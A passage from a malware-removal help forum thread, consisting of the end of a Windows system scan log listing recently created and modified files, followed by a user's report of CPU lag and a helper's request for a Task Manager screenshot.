2014-10-13 10:44 - 2014-10-20 10:13 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-13 10:44 - 2014-10-13 10:44 - 00001156 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-13 10:44 - 2014-10-13 10:44 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-13 10:44 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-10-13 10:44 - 2014-10-01 11:11 - 00064216 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-10-13 10:44 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys
2014-10-13 10:24 - 2014-10-13 10:25 - 00688992 ____R (Swearware) C:\Users\Jeremy and Heidi\Desktop\dds.com
2014-10-11 22:37 - 2014-10-11 22:37 - 00401920 _____ (Farbar) C:\Users\Jeremy and Heidi\Desktop\MiniToolBox.exe
2014-10-11 22:18 - 2014-10-11 22:18 - 00281280 _____ () C:\windows\Minidump\101114-49483-01.dmp
2014-10-10 08:22 - 2014-10-10 08:22 - 00000000 ____D () C:\Program Files (x86)\GPLGS
2014-10-10 08:21 - 2014-10-10 08:21 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CutePDF
2014-10-10 08:21 - 2014-10-10 08:21 - 00000000 ____D () C:\ProgramData\APN
2014-10-10 08:21 - 2014-10-10 08:21 - 00000000 ____D () C:\Program Files (x86)\Acro Software
2014-10-10 08:21 - 2014-03-05 16:31 - 00489392 _____ (Ask Partner Network) C:\Users\Jeremy and Heidi\Documents\APNSetup1.exe
2014-10-10 08:21 - 2013-10-23 14:24 - 00087600 _____ () C:\windows\system32\cpwmon64.dll
2014-10-10 08:19 - 2014-10-10 08:19 - 05254656 _____ () C:\Users\Jeremy and Heidi\Downloads\converter.exe
2014-10-10 08:19 - 2014-10-10 08:19 - 02003352 _____ (Acro Software Inc. ) C:\Users\Jeremy and Heidi\Downloads\CuteWriter.exe
2014-10-09 09:55 - 2014-10-09 09:56 - 118744568 _____ () C:\Users\Jeremy and Heidi\Downloads\OJ6600_1315-1.exe
2014-10-09 09:55 - 2014-10-09 09:55 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\Hewlett-Packard
2014-10-09 09:55 - 2014-10-09 09:55 - 00000000 ____D () C:\Program Files (x86)\Hewlett-Packard
2014-10-09 09:52 - 2014-10-09 09:53 - 05152768 _____ () C:\Users\Jeremy and Heidi\Downloads\HPSupportSolutionsFramework-11.51.0027.msi
2014-10-07 08:10 - 2014-10-07 08:10 - 00417918 _____ () C:\Users\Jeremy and Heidi\Downloads\Better-Dungeons-Mod-1.7.10.zip
2014-10-03 18:43 - 2014-10-03 18:43 - 00178800 _____ (Sony DADC Austria AG.) C:\windows\SysWOW64\CmdLineExt_x64.dll
2014-10-02 19:14 - 2014-10-02 19:14 - 00000000 ____D () C:\ProgramData\Emsisoft
2014-10-02 12:16 - 2014-11-01 08:06 - 00000000 ____D () C:\Program Files (x86)\Emsisoft Anti-Malware
2014-10-02 12:16 - 2014-10-02 12:16 - 00001145 _____ () C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk
2014-10-02 12:16 - 2014-10-02 12:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware
2014-10-02 12:11 - 2014-10-02 12:15 - 233663808 _____ (Emsisoft GmbH ) C:\Users\Jeremy and Heidi\Desktop\EmsisoftAntiMalwareSetup.exe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-01 08:55 - 2012-08-18 04:55 - 00001107 _____ () C:\Users\Public\Desktop\Desktop Assist.lnk
2014-11-01 08:00 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\system32\sru
2014-11-01 05:39 - 2012-12-18 23:25 - 01684308 _____ () C:\windows\WindowsUpdate.log
2014-11-01 03:45 - 2012-12-21 22:45 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-31 16:49 - 2014-08-14 16:49 - 00000388 _____ () C:\windows\Tasks\SlimCleaner Plus (Scheduled Scan - Jeremy and Heidi).job
2014-10-30 22:23 - 2012-07-26 00:22 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-10-30 22:19 - 2012-12-23 08:59 - 00000000 ____D () C:\ProgramData\pdf995
2014-10-30 22:19 - 2012-07-26 01:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-30 22:19 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files\Common Files\microsoft shared
2014-10-30 22:18 - 2012-07-26 01:12 - 00000000 __RHD () C:\Users\Public\Libraries
2014-10-30 22:18 - 2012-07-26 01:12 - 00000000 ___RD () C:\windows\ToastData
2014-10-30 22:18 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\WinStore
2014-10-30 22:18 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\rescache
2014-10-30 22:18 - 2012-07-25 22:38 - 00000000 ____D () C:\windows\system32\Sysprep
2014-10-30 22:17 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\registration
2014-10-30 17:01 - 2014-09-28 12:39 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\.minecraft
2014-10-30 16:44 - 2014-09-19 20:25 - 00000648 _____ () C:\Users\Jeremy and Heidi\Downloads\server.properties
2014-10-30 16:44 - 2014-09-19 20:25 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\ops.json
2014-10-30 16:44 - 2014-09-19 20:25 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\banned-players.json
2014-10-30 16:44 - 2014-09-19 20:25 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\banned-ips.json
2014-10-30 16:44 - 2014-08-23 21:16 - 00000002 _____ () C:\Users\Jeremy and Heidi\Downloads\usercache.json
2014-10-30 16:44 - 2014-08-23 21:16 - 00000000 ____D () C:\Users\Jeremy and Heidi\Downloads\world
2014-10-30 16:44 - 2012-08-18 04:22 - 00000000 ____D () C:\ProgramData\Origin
2014-10-30 16:43 - 2012-08-18 04:21 - 00000000 ____D () C:\Program Files (x86)\Origin
2014-10-30 16:13 - 2012-07-25 22:26 - 00524288 ___SH () C:\windows\system32\config\BBI
2014-10-30 16:08 - 2012-07-26 00:59 - 00000000 ____D () C:\windows\CbsTemp
2014-10-30 16:03 - 2014-08-08 20:59 - 00000000 ____D () C:\windows\system32\MRT
2014-10-30 15:58 - 2012-12-24 03:02 - 103265616 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-10-29 08:53 - 2012-08-18 04:10 - 01144108 _____ () C:\windows\PFRO.log
2014-10-28 12:02 - 2014-07-12 10:50 - 00140288 ___SH () C:\Users\Jeremy and Heidi\Downloads\Thumbs.db
2014-10-27 21:50 - 2012-07-26 00:28 - 00848230 _____ () C:\windows\system32\PerfStringBackup.INI
2014-10-27 14:31 - 2012-12-21 19:38 - 00003600 _____ () C:\windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3754358886-4043612072-4009104627-1001
2014-10-27 11:15 - 2014-08-28 13:01 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-10-26 15:46 - 2012-07-25 22:26 - 00262144 ___SH () C:\windows\system32\config\ELAM
2014-10-25 12:50 - 2012-12-23 18:00 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\CrashDumps
2014-10-24 14:02 - 2012-12-18 23:25 - 00000000 ___HD () C:\Users\Jeremy and Heidi
2014-10-23 13:24 - 2012-12-23 23:14 - 00000000 ____D () C:\windows\Minidump
2014-10-21 18:56 - 2014-07-28 08:06 - 00000000 ____D () C:\ProgramData\AVG2014
2014-10-21 18:46 - 2012-12-21 22:53 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-10-21 18:45 - 2014-06-17 08:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-21 18:45 - 2012-12-21 22:53 - 00000000 ___HD () C:\$AVG
2014-10-21 18:44 - 2014-09-07 18:59 - 00001392 _____ () C:\Users\Public\Desktop\The Sims 4.lnk
2014-10-16 21:53 - 2012-12-23 08:59 - 00000060 _____ () C:\windows\wpd99.drv
2014-10-14 12:22 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\AUInstallAgent
2014-10-13 12:41 - 2014-09-15 17:17 - 00000000 ____D () C:\windows\ERUNT
2014-10-13 10:41 - 2013-03-08 17:40 - 00098304 ___SH () C:\Users\Jeremy and Heidi\Desktop\Thumbs.db
2014-10-11 22:18 - 2012-12-23 23:12 - 595965047 _____ () C:\windows\MEMORY.DMP
2014-10-10 10:15 - 2014-02-25 19:59 - 00007592 _____ () C:\Users\Jeremy and Heidi\AppData\Local\Resmon.ResmonCfg
2014-10-09 09:55 - 2013-04-19 21:43 - 00000000 ____D () C:\Program Files (x86)\HP
2014-10-06 19:33 - 2012-07-26 00:21 - 00054557 _____ () C:\windows\setupact.log
2014-10-06 15:33 - 2012-07-26 01:12 - 00000000 ____D () C:\windows\system32\SecureBootUpdates
2014-10-02 19:57 - 2014-05-05 10:20 - 00000000 ____D () C:\Program Files (x86)\OpenDownloaderManager

Files to move or delete:
====================
C:\Users\Jeremy and Heidi\o2ik1mvb.exe


Some content of TEMP:
====================
C:\Users\Jeremy and Heidi\AppData\Local\Temp\pylCCED.tmp.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-11-01 03:00

==================== End Of Log ============================

 Thanks for looking at this.



#14 JeremyAndrew


Posted 01 November 2014 - 11:11 AM

I do get an extreme lag when first opening a webpage, it goes to 100% CPU use, but not on IE, usually on Task Mgr, Microsoft indexing and service host (network).  I just experienced it when I posted the last, that's what made me do this second post.



#15 schrauber

  • Malware Response Team

Posted 01 November 2014 - 12:09 PM

Which browser do you use when you have this lag?

> it goes to 100% CPU use, but not on IE, usually on Task Mgr, Microsoft indexing and service host (network).  I just experienced it when I posted the last, that's what made me do this second post.

Please show me a screenshot from the task manager.


regards,
schrauber
